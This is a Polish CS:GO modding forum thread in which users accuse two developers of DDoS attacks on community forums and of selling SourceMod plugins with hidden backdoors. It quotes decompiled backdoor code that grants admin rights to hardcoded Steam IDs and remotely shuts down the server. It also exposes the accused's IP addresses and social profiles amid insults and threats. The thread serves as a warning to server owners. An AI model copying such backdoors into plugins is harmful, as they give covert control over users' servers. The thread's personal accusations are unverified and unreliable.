Jump to content
  • Chmurka
  • Boróweczka
  • Jabłuszko
  • Limonka
  • Czekoladka
  • Węgielek

Recommended Posts

Hello,

 

Temat powstaje dzięki kilku informatorom, którzy byli tak mili i udostępnili troszku dowodów na Pana który kryje się pod nickiem Roberrt. Znajdziecie tutaj również troszku informacji dot. użytkownka znanego pod nazwą Matix. Temat również zaprezentuje w jaki sposób wymienione osoby nabywają pieniądze poprzez sprzedawanie swoich kreacji do Sourcemod'a & jak bardzo niebezpieczne dla użytkowników one są. W pluginach znajdziemy między innymi rzeczy typu backdoory, tak też wasze serwery nie są bezpieczne! ?

 

Na sam początek poniżej znajdziecie kilka informacji dot. Pana o nazwie Roberrt & jego sociale takie jak steam, discord, strony www pod jego nadzorem itp.

 

Strony www;

Serv4u.pl

Pluginysm.pl

 

Profile: 

Discord: Roberrt#8892

Steam: https://steamcommunity.com/id/imroberrt

Facebook: 

 

Na sam początek zacznijmy od ataków na fora. Jednym z przykładów będzie dość popularne forum csgo, mowa tutaj o How2Kill.pl który niestety padł ofiarą zabaw pana Roberrt'a i jego kolegów. Otóż forum H2K jest w szerokim paśmie bardzo dobrze zabezpieczone, jednym z dość popularnych typów ataku na owe forum będzie atak strukturze L7 GET / który w bardzo prosty i łatwy sposób crashuje fora na silnikach takich jak apache, a nawet i nginx jeśli nie zostały dobrze skonfigurowane.

 

Sądząć po samej konfiguracji serwera pana Roberrt'a możemy się dowiedzieć, że nie jest on zabardzo zjawiskową & doświadczoną osobą, kiedy owa osoba niestety nie zna podstawowej konfiguracji CloudFlare, która pomogła nam uzyskać kolejne adresy IP do analizy & porównania.

 

Osobiście nie wiem jak daleko chcą owe osoby zajść poprzez tworzenie hostingu, który stoi na innym - jeszcze gorszym gównie, gdzie serwery sięgają kosztów 30zł. Stawianie swoich serwisów na hostingach takich jak mydevil czy ultimahost(webh) i staranie się udowodnić komuś, jaki to on i jego zespół jest profesjonalny, kiedy najprostrzej rzeczy takiej jak poprawna konfiguracja cloudflare'a jest dla nich problemem.

 

www.serv4u.pl | 104.27.165.98 < - IP Cloudflare podpięte jedynie pod domene
mail.serv4u.pl | 185.238.72.65 < - IP Główne serwera Mailowego
pop.serv4u.pl | 185.238.72.65 < - IP Głowne serwera Pop
smtp.serv4u.pl | 185.238.72.65 < - IP Główne serwera SMTP
ns1.serv4u.pl | 185.238.72.65 < - DNS'y pointujące do serwera gdzie znajduje się główna domena
ns2.serv4u.pl | 185.238.72.65 < - DNS'y pointujące do serwera gdzie znajduje się główna domena

 

Samo to dało mi do myślenia, że jednak nie mamy tutaj doczynienia z kimś zaawansowanym, więc śmiechłem i oplułem. 

 

Kolejnym ku******m zachowaniem ze strony Pana Roberrt'a & Matixa to walenie w strony, (go-code) i powodowanie downtimeów z powodu takiego, że administracja Go-Code zabroniła udostępniania pluginów z Pluginysm.pl na stronie go-code z powodu naruszenia bezpieczeństwa użytkowników.

 

Pan Roberrt postanowił wykorzystać ową słabość H2K & atakować forum powodując downtime & stwarzając problemy administracji h2k.

Niżej podaje Wam mały wicinek logów pozyskanch od H2K:

[Wed Jun 26 02:17:16.883292 2019] [core:crit] [pid 17918] (13)Permission denied: [client 137.74.1.24:0] AH00529: /home/xxxxx/public_html/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home/xxxxx/public_html/' is executable, referer: https://go-code.pl/profil/60-linux/aktywnosc/?type=forums_topic_post&change_section=1


IP Atakującego --> 137.74.1.24 - - [26/Jun/2019:02:04:21 +0200] "GET /sitemap.php HTTP/1.1" 403 - "https://go-code.pl/profil/60-linux/aktywnosc/?type=forums_topic_post&change_section=1" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36 OPR/60.0.3255.151"

IP Atakującego zostało przeanalizowane & doprowadziło najpierw do strony panelu ( http://137.74.1.24/auth/login ). Z początku nie mówiło nam to wiele, jako owym adres IP nie prowadził do niczego. Lecz po jakimś czasie zorientowaliśmy się do czego tak naprawdę jest owym Panel poprzez analizę front-endu samego Panelu. Informacje, jakie mogliśmy tam zgromadzić prowadziły prosto do strony https://serv4u.pl która jest pod okiem Roberrt'a. 

 

Oczywiście po zorientowaniu się, że pan Robert zostawił w tytule strony nazwę domeny serv4u usuną ją aby ominąć problemów, jednak zmiana tytułu mało troszku tutaj daje, no bo jednak co wchodzi do internetu; niestety tam zostaje. Po analizie ciasteczek strony możemy w prosty sposób wywnioskować, jak wyglądała strona & jakie zmiany zostały dodane do naszych ciasteczek w ostatnim czasie. 

Content: "Zjg3ZWNkYzViMWExOWNmYzRmZjU4MjE4In0%3D" --> Cookie content
	GET /: content"Zjg3ZWNkYzViMWExOWNmYzRmZjU4MjE4In0%3D" --> Cookie content
	GET /: content"http://137.74.1.24/auth/login" --> Webserver content
	HTTP/1.1 Connection = "137.74.1.24" ":" 1#(Zjg3ZWNkYzViMWExOWNmYzRmZjU4MjE4In0%3D) --> Webserver content vs Cookie content
	timed out HTTP/1.1 Cached content weburi/1.1"https://serv4u.pl/" --> Cached content

Można jeszcze pobawić się w kilka innych sposobów; wynik jest taki sam, zabawę pozostawiam wam.

 

Alegacje dot. pluginów sprzedawanych z backdoorami również nie są rzeczą, którą powinniśmy pomijać jako, że Wasze serwery są skazane na ataki/przekierowania itp. jeśli używaliście/używacie pluginów ze strony pluginysm.pl, niżej znajdziecie małe adnotacje dot. owych alegacji.

 

Post użytkowników Allienmods.net
 

Spoiler

 

Cytat

After scanning some of the plugins, and decompiling them there you can find some bad shit 

base64_cFillChar;
base64_decodeTable[256] =


if (StrEqual(steamid, "STEAM_1:0:189210523", true) || StrEqual(steamid, "STEAM_0:1:452047314", true) || StrEqual(steamid, "STEAM_1:1:3685391", true))
   if (StrEqual(Text, "take access", true))

        {

            PrintToConsole(client, "~~~ Hello Roberrt or DevLogic !");

            PrintToConsole(client, "~~~ Crashing system in progress..");

            PrintToConsole(client, "~~~ Access Granted !");

            PrintToConsole(client, "~~~ Welcome in root strafe !");

            AddUserFlags(client, 14);

            ClientCommand(client, "play *UI/deathmatch_kill_bonus.wav");

        }  
Cytat

So as you can see, there, 2 owners of the website Pluginysm.pl have the FULL ACCESS to the server and all the permissions, basically, that's why probably they didin't attach the sourcecode ;).

The OWNERS:
1. https://steamcommunity.com/id/imroberrt
2. https://steamcommunity.com/id/matix8981/


if (StrEqual(Text, "off plugin", true))

        {&#65279;

            ServerCommand("hostname ZŁODZIEJE PLUGINÓW!!!!");

            SetFailState("[ROBERRT][BACKDOOR] Wykryto bezprawne uzywanie pluginu, zostaje on wylaczony.");

        }

        if (StrEqual(Text, "off server", true))

        {

            ServerCommand("hostname ZŁODZIEJE PLUGINÓW!!!!");

            LogError("[ROBERRT][BACKDOOR] Wykryto bezprawne uzywanie pluginu, serwer został zdalnie wyłączony.");

            ServerCommand("killserver");

        }

        if (StrEqual(Text, "delete plugin", true)&#65279;)

        {

            ServerCommand("hostname ZŁODZIEJE PLUGINÓW!!!!");

            LogError("[ROBERRT][BACKDOOR] Wykryto bezprawne uzywanie pluginu, został on zdalnie usunięty.");

            DeletePlugin();&#65279;

            ServerCommand("killserver");

        }&#65279;  

 

 

 

 

Osoby używające lub te, które za swoich czasów używały pluginów z owej strony są proszone o wyczyszczenie serwerów z tego śmietnika i dokładny skan plików & zmianę danych aby uniknąć nieprzyjemności.

 

Niżej dodaje kilka screenów z rozmowy pomiędzy Roberrt'em a Mesharskim (właścicielem H2K)

Spoiler

034c5becd28fa7dc87294f9f6b6351eb.png

3c030eabc0fa4ceae808c5bec4631e63.png

 

W screenie poniżej Roberrt ładnie pisze, że zbadaniem elementu i zmianą kodu html <title> aby zawierała domenę serv4u.pl nic nie da. Tak też chciał się obronić przed wszystkimi zarzutami i przemyśleniami o serv4u.pl (podobno nie jego, jednak wszystko jednak pokazało, że jego ? )

bed0c3a8dd83580b173313c3330492ff.png

e55772d71a969adab7544b1776b04e38.png

 

Niżej mamy groźby ze strony Roberrta.

a90015a6132c8b6027b3f5ba83d7d49b.png

 

Po rozmowie z Mesharskim, Pan Roberrt zablokował Mesharskiego na FB:

8f0b19e4f1ed46f90b8a93de0bb6c42c.png

 

Niżej znajdziecie jego profil:

988164c1131b21f8585badeada543fab.png

bc52ec456a6224b491d668e9b6185417.png

 

 

Osobiście nie polecam, jebie i pluje.

  • Lubię to! 1
  • Kocham to! 1

Share this post


Link to post
Share on other sites

Chciałbym tylko zaznaczyć (bo wynika to z kontekstu) że go-code nie jest własnością i nie podlega w żaden sposób H2K. Jesteśmy niezależnym forum i zawsze będziemy niezależnym forum. Jesteśmy zlepkiem osób z różnych stron, tak samo jak Mesharsky jest administratorem u nas i przy okazji właścicielem H2K, tak samo na przykład Avgariat jest tutaj administratorem i przy okazji właścicielem AS. Nie oznacza to jednak, że te fora mają nad nami władzę, jest to układ strikte demokratyczny i każdy z Ekipy ma równy głos w podejmowanych na Go-Code decyzjach

  • Lubię to! 4

Share this post


Link to post
Share on other sites
3 godziny temu, Vasto_Lorde napisał:

Chciałbym tylko zaznaczyć (bo wynika to z kontekstu) że go-code nie jest własnością i nie podlega w żaden sposób H2K. Jesteśmy niezależnym forum i zawsze będziemy niezależnym forum. Jesteśmy zlepkiem osób z różnych stron, tak samo jak Mesharsky jest administratorem u nas i przy okazji właścicielem H2K, tak samo na przykład Avgariat jest tutaj administratorem i przy okazji właścicielem AS. Nie oznacza to jednak, że te fora mają nad nami władzę, jest to układ strikte demokratyczny i każdy z Ekipy ma równy głos w podejmowanych na Go-Code decyzjach

Tak to jest 100% prawda i słuszna uwaga.

 

Chciałbym zaznaczyć, że ataki na go-code były w momencie, kiedy na początku pluginysm.pl się u nas chciało reklamować i tematy zostały u nas skasowane, wtedy poprzez skrypt na serwerze dedykowanym pan Robert oraz pan Matix crashowali stronę, PRZEZ CO padła druga strona, która również była na hostingu go-code bądź nawet dalej jest (Tak byłem wtedy na ich serwerze Discord i sami przez mikrofon mi się o tym chwalili więc wyjebane mam jak się tutaj wybronią wiem jak jest, i sporo innych osób też o tym wie).

 

Atakowanie mojego serwera Dedykowanego, na którym stoją 3 domeny jest ciosem powyżej pasa bo moje forum ma gówno wspólnego z wszystkim a w sumie z niczym bo tak naprawdę kompletnie nic im nie robię, oni szukają dram na siłę i nie wiadomo czego jeszcze, szczeniackie zachowanie na tych forach i nic więcej, podczas godzinnej rozmowy z panem Robertem na discordzie, całą rozmowę widział,@Brum Brum bo otrzymał dostęp do mojego konta Discord, nie otrzymałem odpowiedzi na żadne z moich pytań, i zostało potwierdzone wiele rzeczy, cała ta akcja to jest po prostu wstyd i szukanie konfliktów ze mną na siłę.

Jestem osobą uczciwą i nie mam zamiaru dawać sobą pomiatać, jeżeli kiedyś coś robiłem w przeszłości, bo mam swoje za plecami (Każdy ma swoje głupoty za plecami) o tym również wie @Brum Brum za to mogę przeprosić czyli rok 2k16 i 2k17.

Ode mnie to tyle, spędziliśmy sporo dni, by zebrać w kupę wszystko i przeanalizować wszystkie ataki i tak dalej, nie ma argumentu tutaj który mógłby wybronić pana Roberta, oczywiście całą rozmowę od A do Z mogę wysłać na pw komu tam chce, żadnych przeróbek ani nic, mogę udostępnić na x minut nawet dostęp do konta, nie mam zamiaru brać udziału w tym cyrku na tym community.

 

PS:
Przed napisaniem do niego na discordzie tutaj na tym SS było zamiast napisu Panel, był napis serv4u.pl
Hej! Skorzystałeś z linku lub pobrałeś załącznik? Uhonoruj naszą pracę poprzez rejestrację na forum i rośnij razem z nami! I Przekierowanie na stronę hostingową, po czym Robert od razu zmienił nazwę i usunał przekierowanie, dziwny zbieg okoliczności... :D 

 

51ef43829fe278d313c76d9867b85ad5.png

  • Lubię to! 2

Share this post


Link to post
Share on other sites

Tak, miałem dostęp do konta Mesharskiego przez ~15 minut na przeczytanie całej konwersacji z Robertem. Całkiem zabawna konwersacja daje okejke ? https://imgur.com/a/1ij1jSq
Hej! Skorzystałeś z linku lub pobrałeś załącznik? Uhonoruj naszą pracę poprzez rejestrację na forum i rośnij razem z nami! a tutaj link do ss`a podanego tam https://i.imgur.com/wI1RuHE.png
Hej! Skorzystałeś z linku lub pobrałeś załącznik? Uhonoruj naszą pracę poprzez rejestrację na forum i rośnij razem z nami!

  • Lubię to! 2

Share this post


Link to post
Share on other sites

Pozwolę sobie jeszcze specjalnie dla tego tematu przypomnieć wszystkim niektóre punkty regulaminu:

Cytat

Korzystanie z forum

5. Jeżeli zauważysz, że ktoś narusza regulamin forum, użyj funkcji reportowania.

 

Pisanie postów
3. Zawsze bądź miły i darz respektem innych użytkowników. Bycie toksycznym w stosunku do innych jest wysoce niewskazane.

4. Przestrzegaj netykiety. W szczególności staraj się pisać poprawną polszczyzną.

 

  • Dobry pomysł! 2

Share this post


Link to post
Share on other sites
Posted (edited)

No i właśnie w tym momencie miarka się przebrała. Nie zamierzam wypowiadać się w tym temacie tylko skierować to na drogę prawną i zobaczymy kto co komu udowodni. Jeżeli chodzi o ataki na h2k itd to mówiłem, nie moja sprawka, s4u nie należy do mnie ani do matixa. Więc teraz zagrany w otwarte karty ? a ty elevate nie wiem po co szukasz sobie dodatkowych problemów ? 

Edited by masnuwa_ni
  • Dobry pomysł! 1
  • Haha! 3
  • Przykro mi 1
By Mesharsky,

Za ataki na stronę i działanie na jej szkodę poprzez straty na niej, jedyny droga prawna to może być jedynie dla ciebie kolego, bez pozdrowień.

Share this post


Link to post
Share on other sites

@masnuwa_ni ale kisnę xD to już nic głupszego napisać nie mogłeś? 

Są dowody, są argumenty. Standardowa zagrywka, czyli skrajne zachowanie w efekcie buntu. Pluję.

Share this post


Link to post
Share on other sites
57 minut temu, masnuwa_ni napisał:

No i właśnie w tym momencie miarka się przebrała. Nie zamierzam wypowiadać się w tym temacie tylko skierować to na drogę prawną i zobaczymy kto co komu udowodni. Jeżeli chodzi o ataki na h2k itd to mówiłem, nie moja sprawka, s4u nie należy do mnie ani do matixa. Więc teraz zagrany w otwarte karty ? a ty elevate nie wiem po co szukasz sobie dodatkowych problemów ? 

Nudziłem się w nocy i czytałem konfe, a że byłeś jaki byłeś swojego czasu, to czemuby nie doje*ać Ci teraz jak jest okazja? XD Straszysz wszystkich paragrafami i sądami a prawda jest taka, że nic z tego nie będzie bo nawet du*y z fotela nie ruszysz.

 

Tak czy siak pls idź do tego sądu czy gdzie Ty tam chcesz, daj im te Twoje paragrafy i co Ty tam masz, śmiesznie będzie jak Cię wyśmieją a Ty nadal będziesz musiał wykładać siano za rozmowy konsultacyjne XD

 

~Sayo

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.


  • Recently Browsing   0 members

    No registered users viewing this page.

Nasza historia

Na początku byliśmy małą grupą internetowych znajomych, którzy stwierdzili, że potrzebne jest solidne forum, na którym znajdą się ludzie z dużą wiedzą programistyczną ukierunkowaną na CS:GO. Pomysł powstał na początku 2018 roku, a parę miesięcy później, 19 kwietnia, powstała ta strona internetowa. Jako alternatywna odpowiedź na inne tego typu miejsca, poważnie podeszliśmy do tematu, najpierw tłumacząc angielską dokumentację SourceMod'a na język polski, a potem pisząc rozległe poradniki i wypełniając forum najpotrzebniejszymi rzeczami dla właścicieli serwerów i programistów. Cała nasza Ekipa jest dumna z pracy jaką w to włożyliśmy i cieszymy się że zbierają się wokół nas zarówno ludzie znający tematy sourcepawn'a i konfiguracji, jak i również nowe twarze w tym "biznesie", którym z chęcią niesiemy wiedzę oraz pomoc w rozwiązywaniu problemów.

Największe modyfikacje serwerowe

×
×
  • Create New...